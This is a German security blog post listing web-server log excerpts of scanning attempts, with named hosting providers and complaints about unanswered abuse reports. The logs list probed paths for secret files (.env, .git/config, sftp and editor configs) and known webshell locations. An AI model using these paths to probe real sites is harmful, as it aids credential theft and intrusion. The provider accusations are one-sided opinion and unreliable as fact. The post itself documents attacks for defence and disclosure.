78.153.140.218 website*x.com – – [07/Sep/2025:13:41:16 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 5.0; SM-G900V Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36“
78.153.140.218 website*x.com – – [07/Sep/2025:13:41:17 +0200] „GET /sendgrid.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8“
78.153.140.218 website*x.com – – [07/Sep/2025:13:41:18 +0200] „GET /twilio.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/7.0.55539 Mobile/12H321 Safari/600.1.4“
78.153.140.218 website*x.com – – [07/Sep/2025:13:41:20 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36“
78.153.140.218 website*x.com – – [07/Sep/2025:13:41:21 +0200] „GET /phpinfo/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0“
78.153.140.218 website*x.com – – [07/Sep/2025:13:41:22 +0200] „GET /dev/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.2; rv:57.0) Gecko/20100101 Firefox/57.0“
78.153.140.218 website*x.com – – [07/Sep/2025:13:41:23 +0200] „GET /app_dev.php/_profiler/phpinfo HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36“

MAIL NR. 19 SUNDAY!

abuse@cheapy.host

AS401120 – cheapy.host LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE PROVIDER!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cheapy.host – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.71.181 website*x.com – – [07/Sep/2025:13:05:54 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“

Schauen wir mal, welche Provider nun verantwortungsvoll reagieren!

WEITERE PROTOKOLL-AUSZÜGE vom 04. UND 05. SEPTEMBER 25!

Aufgrund der IGNORANZ und/oder UNTÄTIGKEIT in Bezug auf unsere Abuse-Mails hier 3 weitere Auszüge der TÄGLICH WIEDERKEHRENDEN HACKER-IDIOTEN, die diese 3 Provider mit ihren armseeligen Hacking-Versuche missbrauchen:

AS209605 – UAB Host Baltic

AS214940 – KPROHOST LLC

AS401120 – cheapy.host LLC

Hier die täglich wiederkehrenden Hacking-Versuche! 3 Abuse-Meldungen MIT BEMERKUNGEN für diese fragwürdigen Provider gingen heute raus:

AS209605 – UAB Host Baltic – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
admin@serveroffer.lt – ANSWERED ABOUT IN OUR ABUSE EMAILS BUT DOES NOTHING!!! – THIS IS A TOTAL SCAM!!!
141.98.11.169 website*x.com – – [04/Sep/2025:14:46:46 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
141.98.11.169 website*x.com – – [04/Sep/2025:14:46:56 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com/search?q=wordpress“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:121.0) Gecko/20100101 Firefox/121.0“
141.98.11.169 website*x.com – – [04/Sep/2025:14:46:56 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.facebook.com/“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“

AS401120 – cheapy.host LLC – HERE WITH 2 IP´S! – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cheapy.host – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
196.251.80.146 website*x.com – – [05/Sep/2025:03:38:46 +0200] „GET /xmlrpc.php HTTP/1.0“ 403 – „-“ „Python/3.13 aiohttp/3.12.15“
+
196.251.69.53 website*x.com – – [05/Sep/2025:05:43:55 +0200] „GET /files.php HTTP/1.0“ 302 20 „www.google.com“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36“
196.251.69.53 website*x.com – – [05/Sep/2025:05:44:14 +0200] „GET /style.php HTTP/1.0“ 302 20 „www.google.com“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36“

Schauen wir mal, WANN DIESE 3 VERANTWORTLICHEN PROVIDER IN BEZUG AUF SICHERHEIT ENDLICH REAGIEREN UND DIE SICHERHEITSLÜCKEN IN IHREN SYSTEMEN ENDLICH SCHLIESSEN!!!

PROTOKOLL-AUSZUG 03 SEPTEMBER 25 UND 04 SEPTEMBER 25!

2 Provider die bisher seit MONATEN auf keine einzige Abuse-Mail von uns reagieren! So etwas ist ein absolutes NoGo!

Somit bewerten wir nun diese 2 PROVIDER als absolut IGNORANT, ARROGANT und absolut NICHT SICHERHEITSBEWUSST ein:

AS214940 – KPROHOST LLC – abuse@virtualine.org

AS401120 – cheapy.host LLC – abuse@cheapy.host

Sämtliche Netzwerke dieser 2 sehr fragwürdigen Provider sind über unser eigenes Security-Tool eh schon seit mehr als einen Monat wegen dieser IGNORANZ auf sehr vielen Websites gesperrt! Sämtliche Hacker-Idioten aus diesen Netzwerken bekommen ein freundliches 403! Haha…

AS214940 – KPROHOST LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@virtualine.org – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
198.55.98.253 website*x.com – – [04/Sep/2025:02:28:30 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 7.1.1; CPH1801) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36“
198.55.98.253 website*x.com – – [04/Sep/2025:02:36:44 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)“

AS401120 – cheapy.host LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cheapy.host – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
196.251.80.146 website*x.com – – [03/Sep/2025:20:43:55 +0200] „POST /wp-plain.php HTTP/1.0“ 302 – „www.google.com“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.80.146 website*x.com – – [03/Sep/2025:20:43:55 +0200] „POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.80.146 website*x.com – – [03/Sep/2025:20:43:55 +0200] „GET /wp-content/themes/seotheme/db.php?u HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.80.146 website*x.com – – [03/Sep/2025:20:43:55 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.80.146 website*x.com – – [03/Sep/2025:20:43:55 +0200] „POST /alfacgiapi/perl.alfa HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.80.146 website*x.com – – [03/Sep/2025:20:44:03 +0200] „GET /wp-content/themes/seotheme/db.php?u HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
+
196.251.69.222 website*x.com – – [03/Sep/2025:21:19:02 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „python-requests/2.32.4“
196.251.69.222 website*x.com – – [03/Sep/2025:21:19:02 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „python-requests/2.32.4“

Schauen wir nun mal, welcher PROVIDER WIRKLICH VERANTWORTUNGSBEWUSST REAGIERT!

Seit wir viele Hacking-Versuche fast täglich melden, werden einige dieser Hacker-Idioten vorsichtiger. Man macht das erst mal ein ganz vorsichtiges GET! Kommt da ein 403, hören sie meist auf.

NUR ZU DUMM für all diese armseeligen Hacker-Idioten denn auch das melden wir nun schon seit DEZEMBER 2024!

Die Hacker Vollpfosten des Monats

Weitere Auszüge der Logs von vielen Websites in Bezug auf diese Hacker-Idioten folgen diese Tage. 😉

Tipps, wie man die Website schützen kann findest du über den Link.

Hacker Protokoll August 2025

Das Hacker Protokoll August 2025

Dieses Hacker Protokoll August 2025 ist nicht mehr so umfangreich, da wir ja nicht jeden Zugriff dieser Hacker-Idioten posten. Trotzdem immer wieder diese unermüdlichen Login Idioten und Amateur Hacker, die es wieder und immer wieder versuchen, trotz einem 403, eine Homepage zu hacken.

Dieses Hacker Protokoll August 2025 soll ebenfalls so einige Hosting-Provider und Provider für Cloud´s endlich mal wachrütteln, damit sie ENDLICH die Webspaces ihrer Kunden besser vor diesen ganzen Login- und Hacker-Müll schützen!!! Viele Mails an Abuse der jeweiligen verantwortlichen Provider wurden geschrieben. Oft kam nur Blabla aber es ändert sich absolut NICHTS!

Somit hier nun das Protokoll vomAugust. Man bedenke, die jeweiligen Tabellen sind immer nur ein ganz kleiner Auszug von dem, was da wirklich über den ganzen Tag auf den bestroffenen Websites versucht wurde. Zum Schutz der betroffenen Domains wurden diese ausgeschwärzt oder mit Stern (*) versehen.

Protokolle Auszüge vom 27.08.25 – bis 28.08.25! Heute früh gingen folgende Abuse-Mails MIT ENTSPRECHENDEN BEMERKUNGEN and diverse verantwortliche Provider raus!

Protokolle Auszüge Wochenende vom 29.08.25 – bis 31.08.25!

Heute früh gingen folgende Abuse-Mails MIT ENTSPRECHENDEN BEMERKUNGEN and diverse verantwortliche Provider raus!

Ein Absatz immer eine Abuse-Meldung an bis zu max. 4 Provider gleichzeitig! Ist sehr effektiv, Haha… den die Konkurrenz sieht dann, was bei den anderen mit diesen Hacker-Idioten so abgeht!

FREITAG!

MAIL NR. 1 TODAY!
abuse@vultr.com,abuse@constant.com,IARPOC@Newfold.com,legal@bluehost.com
AS20473 – The Constant Company, LLC – AGAIN AND AGAIN! – – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@vultr.com,abuse@constant.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
207.246.81.54 website*x.com – – [29/Aug/2025:19:29:25 +0200] „GET /.vscode/sftp.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36“
207.246.81.54 website*x.com – – [29/Aug/2025:19:30:26 +0200] „GET /.vscode/ftp-sync.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36“
207.246.81.54 website*x.com – – [29/Aug/2025:19:32:53 +0200] „GET /.vscode/ftpconfig.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36“
207.246.81.54 website*x.com – – [29/Aug/2025:19:35:01 +0200] „GET /.vscode/settings.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36“
207.246.81.54 website*x.com – – [29/Aug/2025:19:35:32 +0200] „GET /sftp-config-alt.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36“
207.246.81.54 website*x.com – – [29/Aug/2025:19:36:54 +0200] „GET /.atom/remote-ftp.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36“
207.246.81.54 website*x.com – – [29/Aug/2025:19:39:03 +0200] „GET /.atom/remote-sync.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36“
207.246.81.54 website*x.com – – [29/Aug/2025:19:39:57 +0200] „GET /ftp.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36“
207.246.81.54 website*x.com – – [29/Aug/2025:19:41:56 +0200] „GET /backend/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36“
207.246.81.54 website*x.com – – [29/Aug/2025:19:43:17 +0200] „GET /core/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36“
207.246.81.54 website*x.com – – [29/Aug/2025:19:45:06 +0200] „GET /config/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36“
207.246.81.54 website*x.com – – [29/Aug/2025:19:46:53 +0200] „GET /sftp.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36“
AS19871 – Network Solutions, LLC – AGAIN AND AGAIN! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IARPOC@Newfold.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
50.6.193.138 website*x.com – – [29/Aug/2025:19:52:41 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS46606 – Unified Layer – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IARPOC@Newfold.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
173.254.24.29 website*x.com – – [29/Aug/2025:20:17:18 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

MAIL NR. 2 TODAY!
abuse@horizoniq.com,abuse@hetzner.com,abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com
AS32475 – Internap Holding LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@horizoniq.com – ALWAYS ANSWERED ABOUT OUR ABUSE EMAILS! THIS IS VERY GOOD!
173.236.127.48 website*x.com – – [29/Aug/2025:21:27:37 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS24940 – Hetzner Online GmbH – ALWAYS STOP THIS HACKER-IDIOTS! VERY GOOD!
abuse@hetzner.com – ALWAYS ANSWERED ABOUT OUR ABUSE EMAILS! THIS IS VERY GOOD!
2a01:4f8:141:2414::2 website*x.com – – [29/Aug/2025:21:51:22 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
13.79.168.144 website*x.com – – [29/Aug/2025:21:54:18 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
13.79.168.144 website*x.com – – [29/Aug/2025:21:54:18 +0200] „GET /CLA.php HTTP/1.0“ 302 – „-“ „-“
13.79.168.144 website*x.com – – [29/Aug/2025:21:54:33 +0200] „GET /gfile.php HTTP/1.0“ 302 – „-“ „-“
13.79.168.144 website*x.com – – [29/Aug/2025:21:54:48 +0200] „GET /aua.php HTTP/1.0“ 302 – „-“ „-“
13.79.168.144 website*x.com – – [29/Aug/2025:21:55:03 +0200] „GET /Sanskrit.php HTTP/1.0“ 302 – „-“ „-“
13.79.168.144 website*x.com – – [29/Aug/2025:21:55:18 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“
13.79.168.144 website*x.com – – [29/Aug/2025:21:55:33 +0200] „GET /great.php HTTP/1.0“ 302 – „-“ „-“
13.79.168.144 website*x.com – – [29/Aug/2025:21:55:48 +0200] „GET /class9.php HTTP/1.0“ 302 – „-“ „-“
13.79.168.144 website*x.com – – [29/Aug/2025:21:56:03 +0200] „GET /pass.php HTTP/1.0“ 403 – „-“ „-“
13.79.168.144 website*x.com – – [29/Aug/2025:21:56:03 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
13.79.168.144 website*x.com – – [29/Aug/2025:21:56:18 +0200] „GET /ot.php HTTP/1.0“ 302 – „-“ „-“
13.79.168.144 website*x.com – – [29/Aug/2025:21:56:33 +0200] „GET /witmm.php HTTP/1.0“ 302 – „-“ „-“
13.79.168.144 website*x.com – – [29/Aug/2025:21:56:48 +0200] „GET /lo.php HTTP/1.0“ 302 – „-“ „-“
13.79.168.144 website*x.com – – [29/Aug/2025:21:57:03 +0200] „GET /asd67.php HTTP/1.0“ 302 – „-“ „-“

MAIL NR. 3 TODAY!
google-cloud-compliance@google.com, network-abuse@google.com,soporte@chilecom.net,lir@nej.cz
AS396982 – Google LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
google-cloud-compliance@google.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
35.227.67.47 website*x.com – – [29/Aug/2025:22:15:10 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net – ALWAYS ANSWERED ABOUT OUR ABUSE EMAILS! THIS IS VERY GOOD!
217.182.71.135 website*x.com – – [29/Aug/2025:22:39:50 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS265831 – SOC. COMERCIAL WIRENET CHILE LTDA – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
soporte@chilecom.net – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
200.63.100.137 website*x.com – – [29/Aug/2025:23:04:23 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
AS31246 – NETBOX Autonomous system – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
lir@nej.cz – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
213.155.227.119 website*x.com – – [29/Aug/2025:23:33:00 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

SAMSTAG!

MAIL NR. 4 TODAY!
google-cloud-compliance@google.com, network-abuse@google.com,abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com
AS396982 – Google LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
google-cloud-compliance@google.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
34.122.216.213 website*x.com – – [30/Aug/2025:00:52:12 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.122.216.213 website*x.com – – [30/Aug/2025:00:52:12 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.122.216.213 website*x.com – – [30/Aug/2025:00:52:12 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.122.216.213 website*x.com – – [30/Aug/2025:00:52:12 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.122.216.213 website*x.com – – [30/Aug/2025:00:52:13 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.122.216.213 website*x.com – – [30/Aug/2025:00:52:13 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
